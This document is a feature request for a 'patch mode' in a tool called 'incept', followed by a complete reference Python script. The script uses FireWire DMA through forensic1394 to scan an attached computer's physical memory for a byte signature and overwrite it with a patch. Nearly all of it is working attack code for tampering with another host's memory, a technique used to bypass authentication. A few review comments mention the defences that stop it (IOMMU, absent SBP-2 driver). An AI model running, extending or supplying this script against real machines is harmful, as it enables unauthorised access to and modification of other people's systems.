Implement a patch mode so that new signatures are easy to test:
incept --patch signature patch offset
It should work like the reference implementation:
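#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Reference signature-patching script: reads memory from the first device on
# the IEEE 1394 bus through forensic1394, looks for a byte signature and
# overwrites it with a patch.
#
# The listing was restored from a typeset copy; the printed line numbers and
# the spacing inserted inside tokens have been removed so the file parses.
from forensic1394 import Bus
from time import sleep
from binascii import unhexlify
from sys import argv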
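# Page size, nearly always 4096 bytes
PAGESIZE = 4096


def findsig(d, sig, off):
    """Return the first address at which *sig* is read back from device *d*.

    One candidate is read per page, at byte offset *off* inside the page,
    starting just above the first 1 MiB. Reads are issued in batches of 128
    through ``d.readv``, which is given ``(address, length)`` pairs and is
    iterated as ``(address, data)`` pairs.

    The loop has no upper bound: it ends only when a candidate equals *sig*
    or when ``d.readv`` raises. The calling script catches ``IOError`` for
    the second case.
    NOTE(review): presumably ``readv`` raises ``IOError`` once a request
    falls outside readable memory -- confirm against forensic1394.
    """
    # Skip the first 1 MiB of memory. The typeset listing showed this as
    # "1_1024_1024", which Python 3 reads as the literal 110241024.
    addr = 1 * 1024 * 1024 + off
    while True:
        # Prepare a batch of 128 requests, one per page
        r = [(addr + PAGESIZE * i, len(sig)) for i in range(128)]

        for caddr, cand in d.readv(r):
            if cand == sig:
                return caddr

        addr += PAGESIZE * 128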
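# Parse the command line arguments: signature and patch are hex strings,
# the offset is a decimal byte offset within a page.
if len(argv) != 4:
    raise SystemExit("usage: %s signature patch offset" % argv[0])
sig, patch, off = unhexlify(argv[1]), unhexlify(argv[2]), int(argv[3])

b = Bus()

# Enable SBP-2 support to ensure we get DMA.
# NOTE(review): everything below depends on the attached host honouring DMA
# requests from the bus. Hosts that do not load an SBP-2 driver, or that
# restrict the 1394 controller with an IOMMU, are expected to refuse these
# reads and writes -- which is the relevant hardening for this class of access.
b.enable_sbp2()
sleep(2.0)

# Open the first device
devices = b.devices()
if not devices:
    raise SystemExit("No device found on the bus.")
d = devices[0]
d.open()

# Find. Only the search is wrapped, so that an I/O error raised later by the
# write or the read-back is not reported as a missing signature.
try:
    addr = findsig(d, sig, off)
except IOError:
    addr = None
    print("Signature not found.")

if addr is not None:
    print("Signature found at %d." % addr)

    # Patch and verify. An explicit comparison is used instead of `assert`,
    # because assertions are stripped when Python runs with -O and the
    # verification would then silently disappear.
    d.write(addr, patch)
    if d.read(addr, len(patch)) != patch:
        raise RuntimeError("Read-back after patching does not match the patch.")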